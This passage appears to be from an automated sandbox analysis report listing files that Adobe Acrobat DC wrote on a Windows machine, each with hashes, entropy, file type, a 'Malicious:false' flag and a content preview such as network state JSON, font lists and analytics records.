                                                                          SHA-256:32B9F5344FF3EFD539BC45EAE7B3985DF198E522EDA0A169551C76BF439288C0
                                                                          SHA-512:4669F205A82115DE2864B18C9A6F8DC06BB38291405E0FC713B2F81C2287D64C7B31401B5A0CDCD0A656159017145A087DFA63408645847F8379B7F37256B614
                                                                          Malicious:false
                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13364031436058397","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":142621},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.6","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):5449
                                                                          Entropy (8bit):5.252458689322009
                                                                          Encrypted:false
                                                                          SSDEEP:96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7URi:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzh7
                                                                          MD5:6F45664D79CBD7FE6B22C79FE532C0EF
                                                                          SHA1:3B089C71811148632DF35BE20462DA8499A0DFB9
                                                                          SHA-256:C17F83CA5FF02DCDFC523153E2F5012C00BB743BBC3037A4DDCA215B1CA3350B
                                                                          SHA-512:BB129CE3A9EEE1B8C4023C5FD8FD662F044709DE3C9D8941632DD73B935A645365AF1A07B602562601E11A300609B8CBE514B6BD0595D4D1A0C35C5EEB249954
                                                                          Malicious:false
                                                                          Preview:*...#................version.1..namespace-.X.Bo................next-map-id.1.Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/.0.>j.r................next-map-id.2.Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/.1.J.4r................next-map-id.3.Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/.2..J.o................next-map-id.4.Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.3..M.^...............Pnamespace-c291b69d_46f8_4b09_b54e_d05df8a1271d-https://rna-resource.acrobat.com/..d.^...............Pnamespace-d7426d52_3038_4cd9_b9cc_897232425509-https://rna-resource.acrobat.com/.u..a...............Snamespace-63b958a8_6f71_4fde_913c_6518794b9fd1-https://rna-v2-resource.acrobat.com/..`aa...............Snamespace-37e4c694_2a8d_4b31_9eb8_e65c5f9e16d5-https://rna-v2-resource.acrobat.com/`v.Yo................next-map-id.5.Pnamespace-30587558_ed88_4bd8_adc0_

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):327
                                                                          Entropy (8bit):5.165328385019317
                                                                          Encrypted:false
                                                                          SSDEEP:6:5PTLnQ+q2PN72nKuAl9OmbzNMxIFUt8uPTLngZmw+uPTLaqQVkwON72nKuAl9Omk:1Q+vVaHAa8jFUt8Sg/+SaPV5OaHAa84J
                                                                          MD5:27E03ED44B157CE58A4E3889975CFE5D
                                                                          SHA1:3C9D9F94060220F339109626C1A442EBB681A0DE
                                                                          SHA-256:7BFDA4B54DFF392E9D27968F6D9A29641AD379D88252F1F90DA364C368861955
                                                                          SHA-512:CE7C17305731DF5F97FF7491D559237B9281375C42D4E444EB3F8C42CEA6DBA81DC14C72607342D12DDDFFBA1FB9D74C55595E43AD775DDFE7B731E8244BDAEA
                                                                          Malicious:false
                                                                          Preview:2024/06/27-02:57:04.379 edc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/06/27-02:57:04.379 edc Recovering log #3.2024/06/27-02:57:04.380 edc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):327
                                                                          Entropy (8bit):5.165328385019317
                                                                          Encrypted:false
                                                                          SSDEEP:6:5PTLnQ+q2PN72nKuAl9OmbzNMxIFUt8uPTLngZmw+uPTLaqQVkwON72nKuAl9Omk:1Q+vVaHAa8jFUt8Sg/+SaPV5OaHAa84J
                                                                          MD5:27E03ED44B157CE58A4E3889975CFE5D
                                                                          SHA1:3C9D9F94060220F339109626C1A442EBB681A0DE
                                                                          SHA-256:7BFDA4B54DFF392E9D27968F6D9A29641AD379D88252F1F90DA364C368861955
                                                                          SHA-512:CE7C17305731DF5F97FF7491D559237B9281375C42D4E444EB3F8C42CEA6DBA81DC14C72607342D12DDDFFBA1FB9D74C55595E43AD775DDFE7B731E8244BDAEA
                                                                          Malicious:false
                                                                          Preview:2024/06/27-02:57:04.379 edc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/06/27-02:57:04.379 edc Recovering log #3.2024/06/27-02:57:04.380 edc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240627065710Z-238.bmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PC bitmap, Windows 3.x format, 124 x -152 x 32, cbSize 75446, bits offset 54
                                                                          Category:dropped
                                                                          Size (bytes):75446
                                                                          Entropy (8bit):1.736679494931189
                                                                          Encrypted:false
                                                                          SSDEEP:96:5pMhC49FdYrdeYTmPZ8aoipbFt+5EWDKh2/9KUQQFuLwxma3gZKgSYWu:GFV8yF6RR/90HLs9gZKCn
                                                                          MD5:6C98A804262E5FEE2CC6AEE1F630CE54
                                                                          SHA1:4B705E495E96972F7611DC162AB7B4D2498059BD
                                                                          SHA-256:1805C25B2256AF512530565790C28A85D0363D56330A8FE896CB7C60AE2C86CE
                                                                          SHA-512:92BDC6A9083DD64508D0D2EC5B78878FD6B375B470FF34E3FC3F1756B7CEF4562DE42FF10824DB24C1CDAB05DEF350B5C3CD3398C7BAF23B9F19CA4B3C98C463
                                                                          Malicious:false
                                                                          Preview:BM.&......6...(...|...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 13, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 13
                                                                          Category:dropped
                                                                          Size (bytes):86016
                                                                          Entropy (8bit):4.444906836082977
                                                                          Encrypted:false
                                                                          SSDEEP:384:SeLci5tpiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:jKs3OazzU89UTTgUL
                                                                          MD5:7C781168057B181095199A14BE6CE524
                                                                          SHA1:E0BB0932542A0B241D430359BBB39CE2CC9A51C9
                                                                          SHA-256:B5541F621E0AB54BC6E860763FF14761A0B16D1461782322A3CA5834BAE59233
                                                                          SHA-512:E31121707BC795358A42506AC9FC321C1775B757B0CBAE1CBEC516F99DC269B6EF2FFB8CDA42AC437FEDEA9E753B41AEBBB111A8335E97D32D08035E9444C402
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:SQLite Rollback Journal
                                                                          Category:dropped
                                                                          Size (bytes):8720
                                                                          Entropy (8bit):2.2140092186541107
                                                                          Encrypted:false
                                                                          SSDEEP:24:7+tD6OnuwKUqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9d:7MHnCUqPmFTIF3XmHjBoGGR+jMz+LhH
                                                                          MD5:3FD5DBE6DC735AC408F149F383BCBF85
                                                                          SHA1:A7F1E27AED93A3E2E7B5A68E0DB82DB0003E2505
                                                                          SHA-256:9E0A4BC1EB9622479035FF0E1982127CA828DB3D0A0B7FB1F3534F9DD2AF3020
                                                                          SHA-512:03395F9561FF901F1652291C1E106F1A4CA8CD5875DB3178D94468EE40650FF65E1529B26239FD2444BF02A80EF76C2040D1FABAC8661581ABF963E8A6BB467B
                                                                          Malicious:false
                                                                          Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):893
                                                                          Entropy (8bit):7.366016576663508
                                                                          Encrypted:false
                                                                          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                          Malicious:false
                                                                          Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.

                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):252
                                                                          Entropy (8bit):3.034404395079139
                                                                          Encrypted:false
                                                                          SSDEEP:3:kkFkltkVltfllXlE/E/KRkzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB8V7ln3:kKAkLxliBAIdQZV7I7kc3
                                                                          MD5:BE41B2467671088E0CFD3F5A2FCA5EC9
                                                                          SHA1:4DAEDB23265D38C63B777A173294AD5B8AC4F975
                                                                          SHA-256:0DE0480EB58B8DAAE6D8FEE38C4A7470B2B587B1040C3D664D24FC3A6DDDB9A5
                                                                          SHA-512:FE3EC2A29623532A0213AF46FB75C5136EFD5AAF51316931FAC5F354D2B1FBBC4FA28A10D311BC1EF3E5F3CE4887C41D509EF45D6FEB3D489EE88F74A9B8408F
                                                                          Malicious:false
                                                                          Preview:p...... ....`.....<_...(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.4900

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):185099
                                                                          Entropy (8bit):5.182478651346149
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                          MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                          SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                          SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                          SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):185099
                                                                          Entropy (8bit):5.182478651346149
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JsVoWFMWQNk1KUQII5J5lZRT95tFiQibVJDS+Stu/3IVQBrp3Mv9df0CXLhNHqTM:bViyFXE07ZmandGCyN2mM7IgOP0gC
                                                                          MD5:94185C5850C26B3C6FC24ABC385CDA58
                                                                          SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                                                                          SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                                                                          SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.369911684962615
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJM3g98kUwPeUkwRe9:YvXKXGevcEGMbLUkee9
                                                                          MD5:CBCDFEE33E800FA022B543FCC6F856EC
                                                                          SHA1:1B8EF73DD318E592A4EF19476D85E77AA7495169
                                                                          SHA-256:5789645B8FA1EC32B179D375E337F3F70CAD441B4752B47A64CE53C0AAABBABE
                                                                          SHA-512:586AA3C99E568F3A602624CE81A6B7E0E1004CAA9FF05CB4CC7D3B8E67430A093CC458C74027FC2DD015E81F1F64E3E8DA7C1908B058BA38FD7370E2BCD28985
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.324742687235106
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfBoTfXpnrPeUkwRe9:YvXKXGevcEGWTfXcUkee9
                                                                          MD5:4C29E5DD12C94FC8ECE480A32B9114F5
                                                                          SHA1:CE5CB9C706392AA3708C7609CD03A8E018F6D6A2
                                                                          SHA-256:8D8ADCE34B998EF4306BCF1069F37DA4B68BD94D1C198D99DAA8D6688C033EA3
                                                                          SHA-512:CD5DC19479276C47A4E7E1FB19987F8DFB727B4F93FB7B34E9AA05CA66D1D48EA8C1944D868D2ABA4476E1366D835AAD20EA5E5094F1403D768640C009FEA1BF
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.303633539845863
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfBD2G6UpnrPeUkwRe9:YvXKXGevcEGR22cUkee9
                                                                          MD5:1E4AA10BFD66A910164614F5B60C2EE2
                                                                          SHA1:B09C1E0AAC8D18692004D5DC50000C4520471FD5
                                                                          SHA-256:6D7AF1337D38F398B7F318ABA2C6E423FEF1A6A05722A946E63F9ECBC8F41555
                                                                          SHA-512:4551DE56E93439E5B22CF8B01A9B99C78CDB7E0DC4536C41A1C3D8C14927D9276B68F380BFF0980C8C354722FF2B01A2C49615A71EB710BEBCB5060DE2EB0075
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.350164025491304
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfPmwrPeUkwRe9:YvXKXGevcEGH56Ukee9
                                                                          MD5:3172838CCE3A0BAAC34130F856B232EC
                                                                          SHA1:01262BA659C6E1BDDD06848BBFC895DEEE6E3E2D
                                                                          SHA-256:13602B095FF8EA73A433D705C204660A9D6E642B78B94116391513AE95DB3E02
                                                                          SHA-512:7F23304CDD9AC1D16DD6FEC7E6802378E855F808E4A0DEEE1095A41FFC63EE97D809C143F70AE2FC1A4924A3F34EAA9B67A8DEBBA5C38420D301A2FCB75448B7
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.317314330128218
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfJWCtMdPeUkwRe9:YvXKXGevcEGBS8Ukee9
                                                                          MD5:DC9A8AD7859BD0E5FC992DA760F26C11
                                                                          SHA1:DCBA2E709A664386E58E913EFC28FDB0589E325E
                                                                          SHA-256:584A0EA4F07E6E59212D797058C12BC00EC0880E31947F001CEDDBAF550580E3
                                                                          SHA-512:B63201ECB7D806BE9009F0B259F7D511DDD8A0F0175FE217635118661AD045A2A8E1319B76519E0134DD4E8E04EEC1D5E8BDD02DE44788B7B34DEA37455FD76F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.302283715694127
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJf8dPeUkwRe9:YvXKXGevcEGU8Ukee9
                                                                          MD5:620EAEC33366E17085CA622DC087A323
                                                                          SHA1:0B809B138D4125B24BF17A152525D5FFC9745ECC
                                                                          SHA-256:6CC1B6740803AFF92A8BEE30331C15E675758586240D1536329B59C12E1AA94C
                                                                          SHA-512:12A2E76A8D0FF32A2602025C14BFFB5BF2BD98EF799FB368877B167630769945A97657A5A02D63A6109CE20B0AAEBA63D09AE75289CE6E1590447E599D050AF7
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.306077727905318
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfQ1rPeUkwRe9:YvXKXGevcEGY16Ukee9
                                                                          MD5:362A249F3AAA116103D63A3E2ADB7BCB
                                                                          SHA1:103D13C2EEEF2AF3EDEF5CFBD4C2A7D458FB445F
                                                                          SHA-256:C1FFB2EEE7ECA0AA715A51A3D20A98272FF5848E348E0FA6C3B5B7529AEF43A0
                                                                          SHA-512:0086470167D48CD2C4CDD982742E7768174ED143D9CFC91807799773E137EE25AA7F6B4230BE417EF1305F43F0116DF073B0AF58E8A00BB1F6367DD8E1364042
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.312717570002726
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXGnyBKGnZiQ0Y0DoAvJfFldPeUkwRe9:YvXKXGevcEGz8Ukee9
                                                                          MD5:F61D4CAC858A626995908CB3150B27A1
                                                                          SHA1:CB82514E214DEF30256319B0A6A57FE6628FD98A
                                                                          SHA-256:76E72353015B0A1215AB597E4FA1C4892D1B5414DE8415EFDCF57025E5154657
                                                                          SHA-512:5FB60E15384797EAF62980D3901DD8E1B0A96644E2E24E8AC3BEEB40565DC48ED5AAE7F1A274091483641FB2D87C902EA1623AFF3C9D752DDB1A81A60870E433
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"7188a621-4852-4623-93da-6bafa632f807","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1719644502969,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1372
                                                                          Entropy (8bit):5.742630953374839
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XGeUcKLgENRcbrZbq00iCCBrwJo++ns8ct4mFJNJ1:Yv7yEgigrNt0wSJn+ns8cvFJd
                                                                          MD5:50EB3662978C4F751D3F220F4255D86B
                                                                          SHA1:CB839176F71EBF749B3AA16F97541F01F5A9F2DD
                                                                          SHA-256:F8B48E8175077110076844750036D361B2061D9F758E154A65C424788B629CC3
                                                                          SHA-512:98A495ACBCF438ED709A638E38BB4C5B36DC03BD7F94D3D954BEBCD7C9259C6F13CDB53A76681884191128C10EC9EB267EC4CBBC416E03790E909DFC184FF7CE
                                                                          Malicious:false
